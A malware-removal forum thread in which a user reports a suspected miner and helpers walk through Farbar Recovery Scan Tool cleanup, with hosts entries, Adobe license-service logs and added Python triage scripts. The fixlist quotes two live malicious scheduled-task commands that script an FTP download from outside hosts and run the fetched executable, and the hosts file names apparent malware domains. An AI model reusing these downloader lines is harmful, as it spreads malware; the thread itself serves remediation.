[Solved] Suspected miner: folders avira, mb3install and malwarebytes

  • Thread starter: amp999

amp999

Good afternoon!

Under C:\ProgramData there are folders named avira, mb3install and malwarebytes that can be neither opened nor deleted; each is 0 bytes in size.

The hosts file contains the following entries:
Code:
45.58.190.119 systemsettings.xyz
45.156.119.86 evmos.xyz
185.26.112.70 exmos.xyz
185.26.112.70 bestrig.me
185.26.112.70 bestrig.xyz
45.58.190.119 ezmos.xyz
46.8.220.224 ecmos.xyz
185.26.112.70 dashost4.xyz
45.58.190.119 wininit.club
45.58.190.119 wininit2.club
185.26.112.70 taskhostw.com
185.26.112.70 dashost.xyz
45.58.190.119 sghost.xyz
45.58.190.119 sihost.xyz
185.26.112.70 svchost.xyz
185.26.112.70 2fsdfsdgvsdvzxcwwef-defender.xyz
45.58.190.119 winhost.xyz
45.58.190.119 loders.xyz
185.26.112.70 fontdrvhost.ru
185.26.112.70 windrvs.com
45.58.190.119 dashost.club
45.58.190.119 winibackup549.club
185.26.112.70 winibackup98.club
185.26.112.70 winibackup.club
185.26.112.70 srhost.xyz
185.26.112.70 stcubegames.netxi.in
# 127.0.0.1    www.easeus.com # cured by Dr.Web
# 127.0.0.1    activation.easeus.com # cured by Dr.Web
# 127.0.0.1    track.easeus.com # cured by Dr.Web
# 127.0.0.1    66.39.112.91 # cured by Dr.Web
# 127.0.0.1    216.92.151.227 # cured by Dr.Web
# 127.0.0.1    216.92.61.7 # cured by Dr.Web
# 127.0.0.1    update.easeus.com # cured by Dr.Web

The hosts file has now been cleaned.

The EaseUS disk partitioning program was downloaded; it has since been removed from the computer. As the hosts entries above show, a scan with Dr.Web was run (logging was not enabled in the settings, so unfortunately I cannot provide a scan report. Infected files were found in system folders, and Dr.Web seems to have cured them).

Office was also downloaded; it activated, but somehow not properly. Logs keep appearing in the C:\Windows\Temp folder.
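
Added example (not part of the original post): a Python triage of a hosts file shaped like the one quoted above. It separates names pinned to a non-loopback address from loopback blocks and from entries an antivirus has commented out, and flags names built on Windows process names; the sample file, its addresses and its `.example` names are constructed.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in the same shape as the hosts file in the post
# (documentation-range addresses and .example names, not the thread's values).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.10 svchost.example
203.0.113.10 sihost.example
198.51.100.7 taskhostw.example
198.51.100.7 updates.example
0.0.0.0 av-vendor.example
# 127.0.0.1    activation.vendor.example # cured by Dr.Web
not-an-ip broken.example
"""

# Windows process names that hostnames in the post are built on.
SYSTEM_PROCESS_NAMES = {"svchost", "sihost", "taskhostw", "wininit", "dashost", "fontdrvhost"}
LOCAL_NAMES = {"localhost", "localhost.localdomain"}


def _parse_ip(token):
    try:
        return ipaddress.ip_address(token)
    except ValueError:
        return None


def parse_hosts(text):
    """Split hosts-file text into active entries, commented-out entries and malformed lines."""
    active, disabled, malformed = [], [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        commented = line.startswith("#")
        # Drop the leading '#' (if any) and a trailing comment such as "# cured by Dr.Web".
        fields = line.lstrip("#").split("#", 1)[0].split()
        ip = _parse_ip(fields[0]) if fields else None
        if ip is None or len(fields) < 2:
            if not commented:  # ordinary comments are skipped, broken active lines are reported
                malformed.append(lineno)
            continue
        for name in fields[1:]:  # one hosts line may carry several names
            (disabled if commented else active).append((lineno, ip, name.lower()))
    return active, disabled, malformed


def triage(text):
    """Group active entries by what they do to name resolution."""
    active, disabled, malformed = parse_hosts(text)
    redirects = defaultdict(list)  # non-loopback address -> names pinned to it
    sinkholed, lookalikes = [], []
    for _, ip, name in active:
        local = ip.is_loopback or ip.is_unspecified
        if name in LOCAL_NAMES and local:
            continue  # the stock localhost entries
        if local:
            sinkholed.append(name)  # name blocked by pointing it at the local machine
        else:
            redirects[str(ip)].append(name)
        # "wininit2" and "dashost4" style names: ignore trailing digits on the first label.
        label = re.sub(r"\d+$", "", name.split(".", 1)[0])
        if label in SYSTEM_PROCESS_NAMES:
            lookalikes.append(name)
    return {
        "redirects": dict(redirects),
        "sinkholed": sinkholed,
        "process_lookalikes": lookalikes,
        "disabled": [(str(ip), name) for _, ip, name in disabled],
        "malformed_lines": malformed,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_HOSTS)
    for address, names in report["redirects"].items():
        print(f"{address}: {len(names)} name(s) pinned -> {', '.join(names)}")
    print("blocked locally:", report["sinkholed"])
    print("process-name lookalikes:", report["process_lookalikes"])
    print("commented out:", report["disabled"])
    print("malformed lines:", report["malformed_lines"])
```

On Windows the file to read is `%SystemRoot%\System32\drivers\etc\hosts`; pass its text to `triage()`.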
 

Download AV block remover.
Unpack it, run it and follow the instructions. If it does not start, rename the file AVbr.exe to, for example, AV-br.exe (or any other name).
Alternatively, you can use the version with a random name. If it still does not start, run it in Safe Mode with Networking.

When the utility finishes, it will produce a report named AV_block_remove_date-time.log; attach it to your next message.

After the system reboots, collect a new CollectionLog with Autologger in normal boot mode.
 
Download Farbar Recovery Scan Tool (or from the mirror) and save it to the Desktop.
  • Note: you must choose the version compatible with your operating system. If you are not sure which version suits your system, download both and try to run them. Only one of them will run on your system.
1. Start the program with a double click. When the program starts, click Yes to accept the disclaimer.
2. Make sure that List BCD and 90 Days Files are checked in the Optional Scan box.
3. Click the Scan button.
4. When the scan finishes, a report (FRST.txt) will be created in the folder the program was run from.
5. If the program was run for the first time, a second report (Addition.txt) will also be created.
6. Archive FRST.txt and Addition.txt (into a single archive) and attach it to your message.
 
1. Select the following code and copy it to the clipboard (right mouse button, then Copy)
Code:
Start::
CreateRestorePoint:
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-4133732187-2749906039-182019548-1001\...\MountPoints2: {015886c1-3272-11eb-b130-28c63faf6dd7} - "F:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-4133732187-2749906039-182019548-1001\...\MountPoints2: {07349b40-21c1-11eb-b12c-28c63faf6dd7} - "F:\HiSuiteDownLoader.exe"
GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
Task: {05E20FA4-8EFB-4B33-84A5-661542B7EF40} - \MSI LEDBar Controller -> Нет файла <==== ВНИМАНИЕ
Task: {0C518199-F01B-42CF-9CB7-16710B002812} - \Microsoft\Windows\EnterpriseMgmt\MDMMaintenenceTask -> Нет файла <==== ВНИМАНИЕ
Task: {18B684A0-B782-43EA-9E6B-9DB707586251} - System32\Tasks\AdobeUpdateFlac2 => cmd /c echo open ftp2.webpublicservices.org>>ps&echo test>>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe
Task: {25ED74BC-B321-4746-BBB0-4E650EFD6FFD} - \NahimicVRSvc32Run -> Нет файла <==== ВНИМАНИЕ
Task: {2CDA7B85-C0B0-46BA-AFFF-181EA166BE19} - \Nahimic2Svc64Run -> Нет файла <==== ВНИМАНИЕ
Task: {34083E24-DC53-4B88-A0B6-CEDDC608F236} - \Nahimic2Svc32Run -> Нет файла <==== ВНИМАНИЕ
Task: {3DA280C5-B6A5-4E46-A575-2C7604D19999} - \OneDrive Standalone Update Task v2 -> Нет файла <==== ВНИМАНИЕ
Task: {4B6926D3-D490-4D93-82CE-D109F1D1BC80} - \Microsoft\Windows\WindowsUpdate\sih -> Нет файла <==== ВНИМАНИЕ
Task: {4EF17C2C-22FF-4AA2-92B4-CCBD04075721} - \Microsoft\Windows\UpdateOrchestrator\Maintenance Install -> Нет файла <==== ВНИМАНИЕ
Task: {508E3B51-9877-4474-8D07-5737313511AB} - \NahimicVRSvc64Run -> Нет файла <==== ВНИМАНИЕ
Task: {51E47231-8E0D-47E7-8D83-5BD9192998DD} - System32\Tasks\AdobeUpdateFlac => cmd /c echo open ftp2.ha7455h6fi1.net>>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe
Task: {5D81326C-D6EC-49A0-AAB5-D8A874E06E83} - \Microsoft\Windows\UpdateOrchestrator\Reboot -> Нет файла <==== ВНИМАНИЕ
Task: {5F7BC060-134D-40BA-8014-6364F74815C8} - \MSI OCFanKnob Controller -> Нет файла <==== ВНИМАНИЕ
Task: {7072963F-3763-4E9F-A1F5-DE9703BAE827} - \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask -> Нет файла <==== ВНИМАНИЕ
Task: {AAA476FA-B6D3-4A0B-BFE9-92966C8274F4} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot -> Нет файла <==== ВНИМАНИЕ
Task: {C3504016-73C2-470E-95EF-A06B60AE947A} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display -> Нет файла <==== ВНИМАНИЕ
Task: {D008546F-69C9-4844-8C70-BE16F1C11871} - \Microsoft\Windows\UpdateOrchestrator\Combined Scan Download Install -> Нет файла <==== ВНИМАНИЕ
Task: {EC32FE44-A74A-4D0A-98E1-3FEF5261BF99} - \Nahimic2UILauncherRun -> Нет файла <==== ВНИМАНИЕ
Task: {EDEC226D-76E4-431E-8D0D-E46D05AE60C6} - \Microsoft\Windows\UpdateOrchestrator\Policy Install -> Нет файла <==== ВНИМАНИЕ
Edge Extension: (Нет имени) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [не найдено]
Edge Extension: (Нет имени) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [не найдено]
Edge Extension: (Нет имени) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [не найдено]
Edge Extension: (Нет имени) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [не найдено]
2022-11-27 17:19 - 2022-11-27 18:14 - 000000546 _____ C:\Windows\system32\ps
2022-11-27 17:19 - 2022-11-27 18:14 - 000000540 _____ C:\Windows\system32\s
Unlock: C:\DrWeb Quarantine
AlternateDataStreams: C:\Users\amp99\AppData\Local\Temp:$DATA [16]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
Reboot:
End::
2. Run Farbar Recovery Scan Tool as Administrator via the right-click menu.
3. Click the Fix button once and wait. The program will create a log file (Fixlog.txt). Please attach it to your next message.
  • Please note: the computer will be restarted.
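
Added example (not part of the original thread and not FRST's own code): a Python check over FRST-style `Task:` lines like those in the fixlist above. It flags tasks whose file is missing and tasks whose command echoes an FTP script into a file, runs `ftp -s:` on it and then starts the downloaded file. The sample lines, GUIDs, host and paths are constructed; treating `No File` as the English form of the note and splitting the command on `&` without quote handling are assumptions.

```python
import re
from collections import defaultdict

# Constructed lines in the layout of the fixlist above (placeholder GUIDs, host and paths).
SAMPLE_TASKS = r"""
Task: {11111111-2222-3333-4444-555555555555} - \Vendor Updater -> Нет файла <==== ВНИМАНИЕ
Task: {AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE} - System32\Tasks\FakeUpdate => cmd /c echo open ftp.example.invalid>>s&echo user>>s&echo pass>>s&echo binary>>s&echo get a.rar c:\windows\temp\upd.exe>>s&echo bye>>s&ftp -s:s&c:\windows\temp\upd.exe
Task: {99999999-8888-7777-6666-555555555555} - System32\Tasks\Backup => C:\Program Files\Backup\backup.exe /nightly
"""

TASK_RE = re.compile(
    r"^Task: \{(?P<guid>[0-9A-Fa-f-]{36})\} - (?P<path>.+?) (?P<sep>=>|->) (?P<action>.*)$"
)
ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*>{1,2}\s*(?P<file>\S+)$", re.I)
FTP_RE = re.compile(r"^ftp(?:\.exe)?\s.*?-s:(?P<file>\S+)", re.I)
CMD_PREFIX_RE = re.compile(r"^\s*cmd(?:\.exe)?\s+/c\s+", re.I)
# Note printed when the task's file is gone: Russian form as on the page,
# English form assumed to be "No File".
NO_FILE_NOTES = ("No File", "Нет файла")


def analyze_action(action):
    """Detect 'echo lines into a file, feed it to ftp -s:, then run the download'."""
    command = CMD_PREFIX_RE.sub("", action)
    segments = [s.strip() for s in command.split("&") if s.strip()]
    scripts = defaultdict(list)  # script file name -> lines echoed into it
    for index, segment in enumerate(segments):
        echo = ECHO_RE.match(segment)
        if echo:
            scripts[echo["file"].lower()].append(echo["text"])
            continue
        ftp = FTP_RE.match(segment)
        if ftp and ftp["file"].lower() in scripts:
            lines = scripts[ftp["file"].lower()]
            server = next(
                (l.split(None, 1)[1] for l in lines if l.lower().startswith("open ")), None
            )
            # "get <remote> <local>": the third word is where the file lands.
            targets = [
                l.split()[2] for l in lines
                if l.lower().startswith("get ") and len(l.split()) >= 3
            ]
            later = {s.split()[0].lower() for s in segments[index + 1:]}
            return {
                "server": server,
                "downloaded_to": targets,
                "runs_download": any(t.lower() in later for t in targets),
            }
    return None


def triage_tasks(text):
    """Return one record per Task: line with the two checks applied."""
    results = []
    for line in text.splitlines():
        m = TASK_RE.match(line.strip())
        if not m:
            continue
        orphaned = m["sep"] == "->" and m["action"].startswith(NO_FILE_NOTES)
        results.append({
            "guid": m["guid"],
            "path": m["path"],
            "orphaned": orphaned,
            "ftp_dropper": None if orphaned else analyze_action(m["action"]),
        })
    return results


if __name__ == "__main__":
    for task in triage_tasks(SAMPLE_TASKS):
        if task["orphaned"]:
            print(f"{task['path']}: task file missing")
        elif task["ftp_dropper"]:
            print(f"{task['path']}: scripted FTP download {task['ftp_dropper']}")
        else:
            print(f"{task['path']}: no finding")
```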
 
Some strange logs are being created in the C:\Windows\Temp folder. I cannot archive the file named drw-18b8-8ea00f0-fshc.tmp.db and the others, because they are in use at the moment

UPD: As I understand it, the cause is unlicensed Adobe software. C:\Users\Public\Documents
 

I can attach the adobegc.log log right here, can't I? I deleted the folder at C:\Users\Public\Documents, but I still cannot archive adobegc.log, because it is in use by another process.
This folder was a leftover from Adobe Lightroom. I urgently needed to download it for work, but ran into some broken version, so I removed everything and told that job to get lost. But the Lightroom files in the shared folders remained.
I just don't understand why Adobe checks the license so zealously
Code:
11/27/22 18:07:01:599 | [INFO] |  |  |  | AGSService |  |  | 4336 | *********** AGS Service Launched = 8.1.0.3 ************
11/27/22 18:07:01:599 | [INFO] |  |  |  | AGSService |  |  | 4336 | Setting mitigation policies
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessExtensionPointDisablePolicy set successfully
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessDynamicCodePolicy set successfully
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessSignaturePolicy set successfully
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessFontDisablePolicy set successfully
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessImageLoadPolicy set successfully
11/27/22 18:07:01:631 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4184 | *********** AGM Service Launched = 8.1.0.3 ************
11/27/22 18:07:01:631 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4184 | Setting mitigation policies
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessExtensionPointDisablePolicy set successfully
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessDynamicCodePolicy set successfully
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessSignaturePolicy set successfully
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessFontDisablePolicy set successfully
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessImageLoadPolicy set successfully
11/27/22 18:07:01:685 | [ERROR] |  |  |  | AGSService |  |  | 4928 | Caller user name:�������
11/27/22 18:07:01:685 | [ERROR] |  |  |  | AGSService |  |  | 4928 | Started creating entries for uninstaller
11/27/22 18:07:01:689 | [INFO] |  |  |  | AGSService |  |  | 4928 | AdobeGCData folder already exists
11/27/22 18:07:01:689 | [INFO] |  |  |  | AGSService |  |  | 4928 | AdobeGCData folder: checking for junction/symlink
11/27/22 18:07:01:690 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData
11/27/22 18:07:01:691 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid DACL permissions found
11/27/22 18:07:01:691 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid SACL permissions found
11/27/22 18:07:01:692 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db
11/27/22 18:07:01:694 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid DACL permissions found
11/27/22 18:07:01:694 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid SACL permissions found
11/27/22 18:07:01:694 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCLaunchEvent.db
11/27/22 18:07:01:699 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid DACL permissions found
11/27/22 18:07:01:699 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid SACL permissions found
11/27/22 18:07:01:699 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCData.db
11/27/22 18:07:01:699 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\adobegc.log
11/27/22 18:07:01:700 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid DACL permissions found
11/27/22 18:07:01:700 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid SACL permissions found
11/27/22 18:07:01:700 | [INFO] |  |  |  | AGSService |  |  | 4928 | Successfully created/fetched AdobeGCData Folder
11/27/22 18:07:01:700 | [INFO] |  |  |  | AGSService |  |  | 4928 | Thread...
11/27/22 18:07:01:702 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5044 | Sandbox process request: 1 || UninstallClient * AdobeGenuineData *  |
11/27/22 18:07:01:705 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 5044 | Failed to find explorer process id
11/27/22 18:07:01:705 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 5044 | Failed to get explorer process token
11/27/22 18:07:01:705 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5044 | Going to sleep for 20 mins and then will try again
11/27/22 18:07:01:727 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 5012 | Initializing Directory Watcher for the directory : C
11/27/22 18:07:02:176 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 5012 | Process Creation Monitoring enabled...
11/27/22 18:07:02:176 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 5012 | Directory Watcher successfully initiated
11/27/22 18:07:02:181 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 5840 | Waiting for WRITE operation Callback...
11/27/22 18:14:21:790 | [INFO] |  |  |  | AGSService |  |  | 4380 | *********** AGS Service Launched = 8.1.0.3 ************
11/27/22 18:14:21:790 | [INFO] |  |  |  | AGSService |  |  | 4380 | Setting mitigation policies
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessExtensionPointDisablePolicy set successfully
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessDynamicCodePolicy set successfully
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessSignaturePolicy set successfully
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessFontDisablePolicy set successfully
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessImageLoadPolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4400 | *********** AGM Service Launched = 8.1.0.3 ************
11/27/22 18:14:21:799 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4400 | Setting mitigation policies
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessExtensionPointDisablePolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessDynamicCodePolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessSignaturePolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessFontDisablePolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessImageLoadPolicy set successfully
11/27/22 18:14:21:823 | [ERROR] |  |  |  | AGSService |  |  | 4908 | Caller user name:�������
11/27/22 18:14:21:823 | [ERROR] |  |  |  | AGSService |  |  | 4908 | Started creating entries for uninstaller
11/27/22 18:14:21:832 | [INFO] |  |  |  | AGSService |  |  | 4908 | AdobeGCData folder already exists
11/27/22 18:14:21:832 | [INFO] |  |  |  | AGSService |  |  | 4908 | AdobeGCData folder: checking for junction/symlink
11/27/22 18:14:21:858 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData
11/27/22 18:14:21:860 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 4956 | Initializing Directory Watcher for the directory : C
11/27/22 18:14:21:915 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid DACL permissions found
11/27/22 18:14:21:915 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid SACL permissions found
11/27/22 18:14:21:915 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid DACL permissions found
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid SACL permissions found
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCLaunchEvent.db
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid DACL permissions found
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid SACL permissions found
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCData.db
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\adobegc.log
11/27/22 18:14:21:921 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid DACL permissions found
11/27/22 18:14:21:921 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid SACL permissions found
11/27/22 18:14:21:921 | [INFO] |  |  |  | AGSService |  |  | 4908 | Successfully created/fetched AdobeGCData Folder
11/27/22 18:14:21:921 | [INFO] |  |  |  | AGSService |  |  | 4908 | Thread...
11/27/22 18:14:21:931 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Sandbox process request: 1 || UninstallClient * AdobeGenuineData *  |
11/27/22 18:14:21:934 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Failed to find explorer process id
11/27/22 18:14:21:934 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Failed to get explorer process token
11/27/22 18:14:21:934 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Going to sleep for 20 mins and then will try again
11/27/22 18:14:22:805 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4956 | Process Creation Monitoring enabled...
11/27/22 18:14:22:806 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 4956 | Directory Watcher successfully initiated
11/27/22 18:14:22:818 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Waiting for WRITE operation Callback...
11/27/22 18:34:21:940 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Awake from sleep and trying again to get explorer token
11/27/22 18:34:22:178 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Sandbox process response: 3 ||  *  |
11/27/22 18:34:22:178 | [INFO] |  |  |  | AGSService |  |  | 5252 | Thread inside...
11/27/22 18:34:22:178 | [INFO] |  |  |  | AGSService |  |  | 5252 | Thread calling CFU...
11/27/22 18:34:22:183 | [INFO] |  |  |  | AdobeGCUpdater |  |  | 5252 | ***********AdobeGC Updater library invoked = 8.1.0.3 ************
11/27/22 18:34:22:183 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5252 | Perform WF started
11/27/22 18:34:22:184 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5252 | Perform WF completed
11/27/22 18:34:22:184 | [INFO] |  |  |  | AGSService |  |  | 5252 | Thread cfu launched...
11/27/22 18:34:22:184 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Trying to acquire the semaphore
11/27/22 18:34:22:184 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Semaphore acquired
11/27/22 18:34:22:185 | [INFO] |  |  |  | AdobeGCHostfileValidation |  |  | 12364 | Hostfile opened successfully
11/27/22 18:34:22:185 | [DEBUG] |  |  |  | AdobeGCHostfileValidation |  |  | 12364 | Checking if gocart server url is blocked in hostfile
11/27/22 18:34:22:185 | [INFO] |  |  |  | SLCoreService |  |  | 12364 | Starting up SLCore 2.0 Release (build 2.0.1.360321).
11/27/22 18:34:22:185 | [ERROR] |  |  |  | SLCoreService |  |  | 12364 | user based licensing: 0
11/27/22 18:34:22:185 | [INFO] |  |  |  | SLCoreService |  |  | 12364 | Service construction took 0.1 ms and succeed.
11/27/22 18:34:22:420 | [INFO] |  |  |  | SLCoreService |  |  | 12364 | Shutting down SLCore 2.0 Release (build 2.0.1.360321).
11/27/22 18:34:22:420 | [INFO] |  |  |  | SLCoreService |  |  | 12364 | Service destruction took 0.1 ms and succeed.
11/27/22 18:34:22:420 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 12364 | Fetching server URL from dispatch table
11/27/22 18:34:22:422 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | __OOBELIB_LOG_FILE__
11/27/22 18:34:22:422 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | (re)load Local Dispatch Table status-[0].
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Scope : [2]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Setting scope to GM
11/27/22 18:34:22:423 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 12364 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | EndPoint requested: [PostRulesData]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Length of the URL: [50]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Returning from getEndpointAddr: [0]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | EndPoint requested: [PostRulesData]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Length of the URL: [50]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | URL found [https://genuine.adobe.com/server/services/check/v1]
